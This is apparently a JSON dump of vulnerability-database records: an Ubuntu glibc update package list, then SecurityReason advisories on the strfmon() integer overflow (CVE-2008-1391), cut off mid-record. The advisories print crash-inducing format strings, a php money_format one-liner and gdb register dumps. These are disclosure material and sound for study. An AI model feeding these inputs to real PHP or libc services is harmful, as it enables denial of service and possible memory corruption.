http://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libc6_2.11.1-0ubuntu7.1_i386.deb\r\n Size/MD5: 3779220 05f769d40e681c86bf6769a1f125f205\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libnss-dns-udeb_2.11.1-0ubuntu7.1_i386.udeb\r\n Size/MD5: 10264 a39304c1dc680e0bb3bcb0b64beb168b\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/main/e/eglibc/libnss-files-udeb_2.11.1-0ubuntu7.1_i386.udeb\r\n Size/MD5: 16746 ecd47235c17a7c7a95296d320f624925\r\n \r\nhttp://security.ubuntu.com/ubuntu/pool/universe/e/eglibc/nscd_2.11.1-0ubuntu7.1_i386.deb\r\n Size/MD5: 202878 9c72bebbc52970cdf400d9a0a6a0c01c\r\n\r\n powerpc architecture (Apple Macintosh G3/G4/G5):\r\n\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc-bin_2.11.1-0ubuntu7.1_powerpc.deb\r\n Size/MD5: 778576 162b45633f50cd955fc4822fef84512d\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc-dev-bin_2.11.1-0ubuntu7.1_powerpc.deb\r\n Size/MD5: 219188 0e90cb7859b80fe8587c284b1cf2ba64\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-dbg_2.11.1-0ubuntu7.1_powerpc.deb\r\n Size/MD5: 11935376 0ec61ccc16a4002927ef6a34b1c3037b\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libc6-dev-ppc64_2.11.1-0ubuntu7.1_powerpc.deb\r\n Size/MD5: 2411342 e3df46065b5b2287631fde8e33d06ac1\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-dev_2.11.1-0ubuntu7.1_powerpc.deb\r\n Size/MD5: 2904744 f8e054b36e1c25d4d0ad773e2df1dae8\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-pic_2.11.1-0ubuntu7.1_powerpc.deb\r\n Size/MD5: 1684904 6edc1beb6a128ed03cc917ea14d9871f\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-ppc64_2.11.1-0ubuntu7.1_powerpc.deb\r\n Size/MD5: 4356036 c58376924038aa0e8d5d3a2d4d2f5ddd\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-prof_2.11.1-0ubuntu7.1_powerpc.deb\r\n Size/MD5: 2376404 a1da1310e586a6cd24691676e0d5f37d\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-udeb_2.11.1-0ubuntu7.1_powerpc.udeb\r\n Size/MD5: 1273650 b194ff197a44b58946188a0cb46597d8\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6_2.11.1-0ubuntu7.1_powerpc.deb\r\n Size/MD5: 4350224 9a751d3b679249da9ca84a00b38867e8\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libnss-dns-udeb_2.11.1-0ubuntu7.1_powerpc.udeb\r\n Size/MD5: 10960 a2a01824fe1c01db5beda29bd94f85e9\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libnss-files-udeb_2.11.1-0ubuntu7.1_powerpc.udeb\r\n Size/MD5: 17544 15cf7394f54f03db0118041af9156d94\r\n http://ports.ubuntu.com/pool/universe/e/eglibc/nscd_2.11.1-0ubuntu7.1_powerpc.deb\r\n Size/MD5: 207232 da3db73f45ccaa2ea442fa96cf30a7ab\r\n\r\n sparc architecture (Sun SPARC/UltraSPARC):\r\n\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc-bin_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 748374 110fddf0e827f284f39469f6ba7d88ff\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc-dev-bin_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 217596 9b158e47c7b5de2faef5e489578a069b\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-dbg_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 42615332 3961de031680240a37fc47296f419011\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libc6-dev-sparc64_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 2630840 2e259c69a1da1e42ee363ae44cf440a8\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-dev_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 2930342 ab1cbdc690c23526454c89572c1279d4\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-pic_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 1710196 4ccecb4ace328a7f3ff6a61479e7487d\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-prof_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 2391158 55f69253cf619fe9f6442a91defb78de\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparc64_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 4335174 0b6f37263a46f458046cceeeff8ce859\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparc64b_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 1831380 ce74f393f65a70474911e2dc578e0091\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparc64v2_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 1774820 fd5d8e621b06346f56cfa6fbf59e4863\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparc64v_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 1775850 72fe2bb6b4a8df4861d4c492dca78d0b\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparcv9b_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 1651042 e922d45013457f7a71805342e103a63c\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparcv9v2_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 1733822 6241760b65a2edca2be925e74de8c236\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-sparcv9v_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 1732826 8f46bfef21a98113037e41c197581d73\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6-udeb_2.11.1-0ubuntu7.1_sparc.udeb\r\n Size/MD5: 1302836 2cf6cb1ab759727831543cec81e96838\r\n http://ports.ubuntu.com/pool/main/e/eglibc/libc6_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 4366704 1edd661a84f744b816b17965dfd5f3c4\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libnss-dns-udeb_2.11.1-0ubuntu7.1_sparc.udeb\r\n Size/MD5: 9750 1f3367ffee93829817e9f22732c44c97\r\n \r\nhttp://ports.ubuntu.com/pool/main/e/eglibc/libnss-files-udeb_2.11.1-0ubuntu7.1_sparc.udeb\r\n Size/MD5: 16282 372ebed356c86943ef61aab37f026b12\r\n http://ports.ubuntu.com/pool/universe/e/eglibc/nscd_2.11.1-0ubuntu7.1_sparc.deb\r\n Size/MD5: 203348 8e0934fa1e7e88d01856e0ca935afe7c\r\n", "edition": 1, "modified": "2010-05-27T00:00:00", "published": "2010-05-27T00:00:00", "id": "SECURITYVULNS:DOC:23941", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:23941", "title": "[USN-944-1] GNU C Library vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:36", "bulletinFamily": "software", "cvelist": ["CVE-2010-0296", "CVE-2010-0830"], "description": "Invalid mntent functions string processing, ELF format parsing memory corruption.", "edition": 1, "modified": "2010-05-27T00:00:00", "published": "2010-05-27T00:00:00", "id": "SECURITYVULNS:VULN:10874", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10874", "title": "GNU glibc library security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:25", "bulletinFamily": "software", "cvelist": ["CVE-2008-1391"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ *BSD libc (strfmon) Multiple vulnerabilities ]\r\n\r\nAuthor: Maksymilian Arciemowicz (cxib)\r\nSecurityReason.com\r\nDate:\r\n- - Written: 10.03.2008\r\n- - Public: 25.03.2008\r\n\r\nSecurityReason Research\r\nSecurityAlert Id: 53\r\n\r\nCVE: CVE-2008-1391\r\nSecurityRisk: High\r\n\r\nAffected Software: \r\nFreeBSD lines: 6,7\r\nNetBSD 4\r\nanother systems what use this functions.\r\nStandard C Library (libc, -lc) for BSD\r\nprobably some MacOS version\r\n\r\nAdvisory URL:\r\nhttp://securityreason.com/achievement_securityalert/53\r\nVendor: http://www.php.net\r\n\r\n- --- 0.Description ---\r\nstrfmon -- convert monetary value to string\r\n\r\nThe strfmon() function places characters into the array pointed to by s as controlled by the string pointed to by format. \r\nNo more than maxsize bytes are placed into the array.\r\n\r\nThe format string is composed of zero or more directives: ordinary characters (not %), which are copied unchanged to the\r\noutput stream; and conversion specifications, each of which results in fetching zero or more subsequent arguments. Each\r\nconversion specification is introduced by the % character.\r\n\r\nSYNOPSIS:\r\n\r\n#include <monetary.h>\r\n\r\n ssize_t\r\n strfmon(char * restrict s, size_t maxsize, const char * restrict format,\r\n ...);\r\n\r\n- --- 1. /usr/src/lib/libc/stdlib/strfmon.c - Integer Overflow ---\r\nThe main problem and vulnerability exist in strfmon() function. When we use this function in example program:\r\n\r\n- ---example-start--\r\n#include <stdio.h>\r\n#include <monetary.h>\r\n\r\nint main(int argc, char* argv[]){\r\n char buff[51];\r\n char *bux=buff;\r\n int res;\r\n \r\n res=strfmon(bux, 50, argv[1], "0");\r\n return 0;\r\n}\r\n- ---example-end--\r\n\r\nand compile it, we can manipulate format string.\r\n\r\nLet's try to run example:\r\ncxib# ./pln %99999999999999999999n\r\nSegmentation fault (core dumped)\r\n\r\nWhat is wrong? Let's see\r\n\r\ncxib# gdb -q pln\r\n(no debugging symbols found)...(gdb) r %99999999999999999999n\r\nStarting program: /cxib/C/pln %99999999999999999999n\r\n(no debugging symbols found)...(no debugging symbols found)...\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x2814e0e6 in memmove () from /lib/libc.so.7\r\n(gdb)\r\n\r\nmemmove() will bad reallocation memory. \r\n\r\ncxib# gdb -q pln\r\n(no debugging symbols found)...(gdb) r %.9999999999n\r\nStarting program: /cxib/C/pln %.9999999999n\r\n(no debugging symbols found)...(no debugging symbols found)...\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x2814f093 in abort () from /lib/libc.so.7\r\n\r\n\r\nNext example is :\r\n\r\ncxib# ./pln %#99999999999999999999n\r\n\r\nLong execution time. Let's try check this process :\r\n- --------------------------\r\ncxib# ps -aux | grep pln\r\ncxib 1843 89.1 13.2 140320 119588 p2 R+ 4:29PM 0:09.68 ./pln %#99999999999999999999n\r\ncxib# ps -aux | grep pln\r\ncxib 1843 94.7 48.4 482336 438236 p2 R+ 4:29PM 1:54.07 ./pln %#99999999999999999999n\r\n\r\n1 VSZ=140320\r\n2 VSZ=482336\r\n\r\n- ----------------------------\r\n\r\nWhy? pln will allocate more memory that we have. PHP use strfmon() in money_format() function. When we use mod_php5 in\r\napache, we can create example exploit.. result will be :\r\n\r\n- ---apache-child-die---\r\nswap_pager: out of swap space\r\nswap_pager_getswapspace(16): failed\r\nMar 15 21:03:23 cxib kernel: pid 1210 (httpd), uid 80, was killed: out of swap space\r\n- ---apache-child-die---\r\n\r\nDifference between %99999999999999999999n and (%#99999999999999999999n or %.9999999999n) is "#" or "."\r\n\r\n o A `#' sign followed by a decimal number specifying the maximum\r\n expected number of digits after the radix character.\r\n o A `.' character followed by a decimal number specifying the number\r\n the number of digits after the radix character.\r\n\r\nLet's see the source of strfmon() function :\r\n\r\n- ---strfmon()-start---\r\nssize_t\r\nstrfmon(char * __restrict s, size_t maxsize, const char * __restrict format,\r\n ...)\r\n{\r\n va_list ap;\r\n char *dst; /* output destination pointer */\r\n const char *fmt; /* current format poistion pointer */\r\n struct lconv *lc; /* pointer to lconv structure */\r\n char *asciivalue; /* formatted double pointer */\r\n\r\n int flags; /* formatting options */\r\n int pad_char; /* padding character */\r\n int pad_size; /* pad size */\r\n int width; /* field width */\r\n int left_prec; /* left precision */\r\n int right_prec; /* right precision */\r\n double value; /* just value */\r\n char space_char = ' '; /* space after currency */\r\n\r\n char cs_precedes, /* values gathered from struct lconv */\r\n sep_by_space,\r\n sign_posn,\r\n *signstr,\r\n *currency_symbol;\r\n\r\n char *tmpptr; /* temporary vars */\r\n int sverrno;\r\n\r\n va_start(ap, format);\r\n\r\n lc = localeconv();\r\n dst = s;\r\n fmt = format;\r\n asciivalue = NULL;\r\n currency_symbol = NULL;\r\n pad_size = 0;\r\n\r\n while (*fmt) {\r\n /* pass nonformating characters AS IS */\r\n if (*fmt != '%')\r\n goto literal;\r\n\r\n /* '%' found ! */\r\n\r\n /* "%%" mean just '%' */\r\n if (*(fmt+1) == '%') {\r\n fmt++;\r\n literal:\r\n PRINT(*fmt++);\r\n continue;\r\n }\r\n\r\n /* set up initial values */\r\n flags = (NEED_GROUPING|LOCALE_POSN);\r\n pad_char = ' '; /* padding character is "space" */\r\n left_prec = -1; /* no left precision specified */\r\n right_prec = -1; /* no right precision specified */\r\n width = -1; /* no width specified */\r\n value = 0; /* we have no value to print now */\r\n\r\n /* Flags */\r\n while (1) {\r\n switch (*++fmt) {\r\n case '=': /* fill character */\r\n pad_char = *++fmt;\r\n if (pad_char == '\0')\r\n goto format_error;\r\n continue;\r\n case '^': /* not group currency */\r\n flags &= ~(NEED_GROUPING);\r\n continue;\r\n case '+': /* use locale defined signs */\r\n if (flags & SIGN_POSN_USED)\r\n goto format_error;\r\n flags |= (SIGN_POSN_USED|LOCALE_POSN);\r\n continue;\r\n case '(': /* enclose negatives with () */\r\n if (flags & SIGN_POSN_USED)\r\n goto format_error;\r\n flags |= (SIGN_POSN_USED|PARENTH_POSN);\r\n continue;\r\n case '!': /* suppress currency symbol */\r\n flags |= SUPRESS_CURR_SYMBOL;\r\n continue;\r\n case '-': /* alignment (left) */\r\n flags |= LEFT_JUSTIFY;\r\n continue;\r\n default:\r\n break;\r\n }\r\n break;\r\n }\r\n\r\n /* field Width */\r\n if (isdigit((unsigned char)*fmt)) {\r\n GET_NUMBER(width);\r\n /* Do we have enough space to put number with\r\n * required width ?\r\n */\r\n if (dst + width >= s + maxsize)\r\n goto e2big_error;\r\n }\r\n\r\n /* Left precision */\r\n if (*fmt == '#') {\r\n if (!isdigit((unsigned char)*++fmt))\r\n goto format_error;\r\n GET_NUMBER(left_prec);\r\n }\r\n\r\n /* Right precision */\r\n if (*fmt == '.') {\r\n if (!isdigit((unsigned char)*++fmt))\r\n goto format_error;\r\n GET_NUMBER(right_prec);\r\n }\r\n\r\n /* Conversion Characters */\r\n switch (*fmt++) {\r\n case 'i': /* use internaltion currency format */\r\n flags |= USE_INTL_CURRENCY;\r\n break;\r\n case 'n': /* use national currency format */\r\n flags &= ~(USE_INTL_CURRENCY);\r\n break;\r\n default: /* required character is missing or\r\n premature EOS */\r\n goto format_error;\r\n }\r\n\r\n if (flags & USE_INTL_CURRENCY) {\r\n currency_symbol = strdup(lc->int_curr_symbol);\r\n if (currency_symbol != NULL)\r\n space_char = *(currency_symbol+3);\r\n } else\r\n currency_symbol = strdup(lc->currency_symbol);\r\n\r\n if (currency_symbol == NULL)\r\n goto end_error; /* ENOMEM. */\r\n\r\n /* value itself */\r\n value = va_arg(ap, double);\r\n\r\n /* detect sign */\r\n if (value < 0) {\r\n flags |= IS_NEGATIVE;\r\n value = -value;\r\n }\r\n\r\n /* fill left_prec with amount of padding chars */\r\n if (left_prec >= 0) {\r\n pad_size = __calc_left_pad((flags ^ IS_NEGATIVE),\r\n currency_symbol) -\r\n __calc_left_pad(flags, currency_symbol);\r\n if (pad_size < 0)\r\n pad_size = 0;\r\n }\r\n\r\n asciivalue = __format_grouped_double(value, &flags,\r\n left_prec, right_prec, pad_char);\r\n if (asciivalue == NULL)\r\n goto end_error; /* errno already set */\r\n /* to ENOMEM by malloc() */\r\n\r\n /* set some variables for later use */\r\n __setup_vars(flags, &cs_precedes, &sep_by_space,\r\n &sign_posn, &signstr);\r\n\r\n /*\r\n * Description of some LC_MONETARY's values:\r\n *\r\n * p_cs_precedes & n_cs_precedes\r\n *\r\n * = 1 - $currency_symbol precedes the value\r\n * for a monetary quantity with a non-negative value\r\n * = 0 - symbol succeeds the value\r\n *\r\n * p_sep_by_space & n_sep_by_space\r\n *\r\n * = 0 - no space separates $currency_symbol\r\n * from the value for a monetary quantity with a\r\n * non-negative value\r\n * = 1 - space separates the symbol from the value\r\n * = 2 - space separates the symbol and the sign string,\r\n * if adjacent.\r\n *\r\n * p_sign_posn & n_sign_posn\r\n *\r\n * = 0 - parentheses enclose the quantity and the\r\n * $currency_symbol\r\n * = 1 - the sign string precedes the quantity and the \r\n * $currency_symbol\r\n * = 2 - the sign string succeeds the quantity and the \r\n * $currency_symbol\r\n * = 3 - the sign string precedes the $currency_symbol\r\n * = 4 - the sign string succeeds the $currency_symbol\r\n *\r\n */\r\n\r\n tmpptr = dst;\r\n\r\n while (pad_size-- > 0)\r\n PRINT(' ');\r\n\r\n if (sign_posn == 0 && (flags & IS_NEGATIVE))\r\n PRINT('(');\r\n\r\n if (cs_precedes == 1) {\r\n if (sign_posn == 1 || sign_posn == 3) {\r\n PRINTS(signstr);\r\n if (sep_by_space == 2) /* XXX: ? */\r\n PRINT(' ');\r\n }\r\n\r\n if (!(flags & SUPRESS_CURR_SYMBOL)) {\r\n PRINTS(currency_symbol);\r\n\r\n if (sign_posn == 4) {\r\n if (sep_by_space == 2)\r\n PRINT(space_char);\r\n PRINTS(signstr);\r\n if (sep_by_space == 1)\r\n PRINT(' ');\r\n } else if (sep_by_space == 1)\r\n PRINT(space_char);\r\n }\r\n } else if (sign_posn == 1)\r\n PRINTS(signstr);\r\n\r\n PRINTS(asciivalue);\r\n\r\n if (cs_precedes == 0) {\r\n if (sign_posn == 3) {\r\n if (sep_by_space == 1)\r\n PRINT(' ');\r\n PRINTS(signstr);\r\n }\r\n\r\n if (!(flags & SUPRESS_CURR_SYMBOL)) {\r\n if ((sign_posn == 3 && sep_by_space == 2)\r\n || (sep_by_space == 1\r\n && (sign_posn == 0\r\n || sign_posn == 1\r\n || sign_posn == 2\r\n || sign_posn == 4)))\r\n PRINT(space_char);\r\n PRINTS(currency_symbol); /* XXX: len */\r\n if (sign_posn == 4) {\r\n if (sep_by_space == 2)\r\n PRINT(' ');\r\n PRINTS(signstr);\r\n }\r\n }\r\n }\r\n\r\n if (sign_posn == 2) {\r\n if (sep_by_space == 2)\r\n PRINT(' ');\r\n PRINTS(signstr);\r\n }\r\n\r\n if (sign_posn == 0 && (flags & IS_NEGATIVE))\r\n PRINT(')');\r\n\r\n if (dst - tmpptr < width) {\r\n if (flags & LEFT_JUSTIFY) {\r\n while (dst - tmpptr < width)\r\n PRINT(' ');\r\n } else {\r\n pad_size = dst-tmpptr;\r\n memmove(tmpptr + width-pad_size, tmpptr,\r\n pad_size);\r\n memset(tmpptr, ' ', width-pad_size);\r\n dst += width-pad_size;\r\n }\r\n }\r\n }\r\n\r\n PRINT('\0');\r\n va_end(ap);\r\n free(asciivalue);\r\n free(currency_symbol);\r\n return (dst - s - 1); /* return size of put data except trailing '\0' */\r\n\r\ne2big_error:\r\n errno = E2BIG;\r\n goto end_error;\r\n\r\nformat_error:\r\n errno = EINVAL;\r\n\r\nend_error:\r\n sverrno = errno;\r\n if (asciivalue != NULL)\r\n free(asciivalue);\r\n if (currency_symbol != NULL)\r\n free(currency_symbol);\r\n errno = sverrno;\r\n va_end(ap);\r\n return (-1);\r\n}\r\n- ---strfmon()-end---\r\n\r\nAs we can see locks are corrected, but function GET_NUMBER()\r\n\r\n- ---GET_NUMBER()-start---\r\n#define GET_NUMBER(VAR) do { \\r\n VAR = 0; \\r\n while (isdigit((unsigned char)*fmt)) { \\r\n VAR *= 10; \\r\n VAR += *fmt - '0'; \\r\n fmt++; \\r\n } \\r\n} while (0)\r\n- ---GET_NUMBER()-end---\r\n\r\nfmt=2147483647n => GET_NUMBER(2147483647)\r\nfmt=2147483648n => GET_NUMBER(-2147483648)\r\nfmt=2147483649n => GET_NUMBER(-2147483647)\r\nfmt=4294967296n => GET_NUMBER(0)\r\nfmt=4294967297n => GET_NUMBER(1)\r\n\r\nWe have integer overflow.\r\n\r\nNext problem is with int left_prec and right_prec. Sum of this int's isn't checked.\r\n\r\n\r\nProblem exist also in printf() function.\r\n\r\nExample code will show Integer Overflow .\r\n\r\n- ---example-start--\r\n#include <stdio.h>\r\n\r\nint\r\nmain(int argc, char *argv[])\r\n{\r\nprintf("%1410065408.1410065407f\n", 2);\r\nreturn 0;\r\n}\r\n- ---example-end--\r\n\r\ncxib# gcc -o pln pln.c && ./pln\r\nSegmentation fault (core dumped)\r\n\r\nWhat is wrong? the same problem that was in strfmon() function.\r\n\r\n- ---\r\n/* convert to string */\r\n snprintf(fmt, sizeof(fmt), "%%%d.%df", left_prec + right_prec + 1,\r\n right_prec);\r\n avalue_size = asprintf(&avalue, fmt, value);\r\n- ---\r\n\r\nfmt is here 32 chars table. So for format like\r\n\r\nstrfmon(bux, 50, "%.10n", "1.1");\r\n\r\nfmt will have %11.10f\r\n\r\nfor\r\n res=strfmon(bux, 50, "%.1410065407n", "1.1");\r\n\r\nwill be crash here \r\n avalue_size = asprintf(&avalue, fmt, value);\r\n\r\nfmt=%1410065408.1410065407f\r\nvalue=1.1\r\n\r\nit is possible? asprintf(&avalue, "%.1410065407f", "1.1");\r\nand the question is why? Let's see to gdb\r\n\r\ncxib# gdb -q pln\r\n(no debugging symbols found)...(gdb) r\r\nStarting program: /cxib/C/pln \r\n(no debugging symbols found)...(no debugging symbols found)...\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x2814f0a3 in abort () from /lib/libc.so.7\r\n\r\nSecurityReason will only alarm all BSDs developers to check libc. A lot of programs (with strfmon function) should be\r\nrecompiled after libc updated. We have informed NetBSD and FreeBSD teams, but we don't know how exactly use this functions.\r\nThe priority of strfmon() issues are very High. \r\n\r\n- --- 2. Exploit ---\r\nSecurityReason will not public official exploit for this issue.\r\n\r\n- --- 3. How to fix ---\r\nWe have informed NetBSD teams about it. strfmon() function is fixed in\r\n\r\nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/stdlib/strfmon.c\r\n\r\nbut we are not sure of it is correct. \r\n\r\n- --- 4. Greets ---\r\nsp3x Infospec p_e_a Chujwamwdupe schain and dr Truderung (za ndst z C)\r\n\r\n- --- 5. Contact ---\r\nAuthor: SecurityReason [ Maksymilian Arciemowicz ]\r\nEmail: cxib [at] securityreason [dot] com\r\nGPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg [NEW KEY]\r\nGPG: http://securityreason.com/key/Arciemowicz.Maksymilian.gpg.old [OLD KEY]\r\nhttp://securityreason.com\r\nhttp://securityreason.pl\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.4 (FreeBSD)\r\n\r\niD8DBQFH6Un9W1OhNJH6DMURAsSEAJwMuWlEKrzHinBM1ojAxGIFOHohswCfZhxM\r\nHcKAw4DGKq13jrhrwsP0BF4=\r\n=ifF2\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2008-03-27T00:00:00", "published": "2008-03-27T00:00:00", "id": "SECURITYVULNS:DOC:19527", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:19527", "title": "[securityreason] *BSD libc (strfmon) Multiple vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:29", "bulletinFamily": "software", "cvelist": ["CVE-2008-1391"], "description": "Integer overflow on format specificator in strfmon(). NULL pointer dereference in printf().", "edition": 1, "modified": "2009-09-18T00:00:00", "published": "2009-09-18T00:00:00", "id": "SECURITYVULNS:VULN:8843", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:8843", "title": "Multiple BSD and Linux systems strfmon() libc / glibc function integer overflow", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:31", "bulletinFamily": "software", "cvelist": ["CVE-2008-1391"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n[ glibc x<=2.10.1 stdio/strfmon.c Multiple vulnerabilities ]\r\n\r\nAuthor: Maksymilian Arciemowicz\r\nhttp://SecurityReason.com\r\nDate:\r\n- - Dis.: 10.03.2008\r\n- - Pub.: 17.09.2009\r\n\r\nCVE: CVE-2008-1391\r\nRisk: High\r\n\r\nAffected Software (tested 27.08.2009):\r\n- - Fedora 11\r\n- - Slackware 12.2\r\n- - Ubuntu 9.04\r\n- - others linux distributions\r\n\r\nOriginal URL:\r\nhttp://securityreason.com/achievement_securityalert/67\r\n\r\nPrevious URL:\r\nhttp://securityreason.com/achievement_securityalert/53\r\n\r\n- --- 0.Description ---\r\nstrfmon -- convert monetary value to string\r\n\r\nThe strfmon() function places characters into the array pointed to by s as controlled by the string\r\npointed to by format. No\r\nmore than maxsize bytes are placed into the array.\r\n\r\nThe format string is composed of zero or more directives: ordinary characters (not %), which are\r\ncopied unchanged to the output\r\nstream; and\r\nconversion specifications, each of which results in fetching zero or more\r\nsubsequent arguments. Each conversion specification is introduced by the %\r\ncharacter.\r\n\r\nSYNOPSIS:\r\n\r\n#include <monetary.h>\r\n\r\nssize_t\r\nstrfmon(char * restrict s, size_t maxsize, const char * restrict\r\nformat,\r\n...);\r\n\r\n- --- 1. glibc x<=2.10.1 stdio/strfmon.c Multiple vulnerabilities ---\r\nIn March 2008, our team has published a security note (SREASONRES:20080325) about vulnerabilities\r\nin strfmon(3) function. Issue\r\nhas been officially diagnosed in NetBSD, FreeBSD and MacOSX. However, from the source code due to a\r\nglibc also is vulnerable to.\r\nWe have informed glibc team. However, the description of the issue and fix was not enough for gnu\r\nteam. They has changed status\r\nfor BOGUS and response was:\r\n\r\n- --- \r\nAnd what exactly does an BSD implementation has to do with glibc?\r\n- ---\r\n\r\nToday we now, only NetBSD is secure for this. And all systems uses glibc are affected. Despite the\r\ndifferences in the code\r\nNetBSD libc and glibc, issue is the same but the exploit differs from that presented in \r\n(SREASONRES:20080325).\r\n\r\nDescription of the vulnerabalitie:\r\nhttp://securityreason.com/achievement_securityalert/53 (SREASONRES:20080325)\r\nhttp://xorl.wordpress.com/2009/04/11/cve-2008-1391-netbsd-strfmon-integer-overflow/\r\n\r\nDescription of the fix:\r\nftp://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2008-006.txt.asc\r\n\r\nTo present this issue in Fedora 11, we will use php client. money_format() use strfmon(3) function\r\nso this program will be perfect.\r\n\r\n[cx@localhost ~]$ php -r 'money_format("%.1073741821i",1);'\r\nSegmentation fault\r\n\r\nfor 'money_format("%.1073741821i",1);' we will get\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x0019331a in __printf_fp () from /lib/libc.so.6\r\n\r\n(gdb) bt\r\n#0 0x0019331a in __printf_fp () from /lib/libc.so.6\r\n#1 0x0018832b in __vstrfmon_l () from /lib/libc.so.6\r\n#2 0x00187a36 in strfmon () from /lib/libc.so.6\r\n\r\nstrfmon() will call to __printf_fp() with overflowed arg. In result\r\n\r\n(gdb) x/20s ($esi)-10\r\n0x8448ff6: ""\r\n0x8448ff7: ""\r\n0x8448ff8: "0"\r\n0x8448ffa: ""\r\n0x8448ffb: ""\r\n0x8448ffc: "0"\r\n0x8448ffe: ""\r\n0x8448fff: ""\r\n0x8449000: <Address 0x8449000 out of bounds>\r\n0x8449000: <Address 0x8449000 out of bounds>\r\n0x8449000: <Address 0x8449000 out of bounds>\r\n...\r\n(gdb) i r\r\neax 0x30 48\r\necx 0x0 0\r\nedx 0x0 0\r\nebx 0x2bdff4 2875380\r\nesp 0xbfffec14 0xbfffec14\r\nebp 0xbfffed78 0xbfffed78\r\nesi 0x8449000 138711040\r\nedi 0x810c 33036\r\neip 0x19331a 0x19331a <__printf_fp+3274>\r\n\r\nNow let's see what will hapen for 'money_format("%.1073741822i",1);'\r\n\r\nProgram received signal SIGSEGV, Segmentation fault.\r\n0x0034b27b in hack_digit.12295 () from /lib/libc.so.6\r\n\r\nphp will crash in hack_digit().\r\n\r\n(gdb) i r\r\neax 0x3ffffffe 1073741822\r\necx 0x32 50\r\nedx 0x2 2\r\nebx 0x476ff4 4681716\r\nesp 0xbfffebc4 0xbfffebc4\r\nebp 0xbfffebf4 0xbfffebf4\r\nesi 0x32 50\r\nedi 0x3e 62\r\n\r\nwe can try change edi register.\r\n\r\nFor 'money_format("%.1073741824i",1);'\r\n(gdb) i r\r\neax 0x40000000 1073741824\r\necx 0x32 50\r\nedx 0x2 2\r\nebx 0x35bff4 3522548\r\nesp 0xbfffebbc 0xbfffebbc\r\nebp 0xbfffebec 0xbfffebec\r\nesi 0x32 50\r\nedi 0x42 66\r\n\r\n\r\nBut let's see what will hapen for 'money_format("%.77715949976712904702i", 1.1);'\r\n\r\ncrash in\r\nProgram received signal 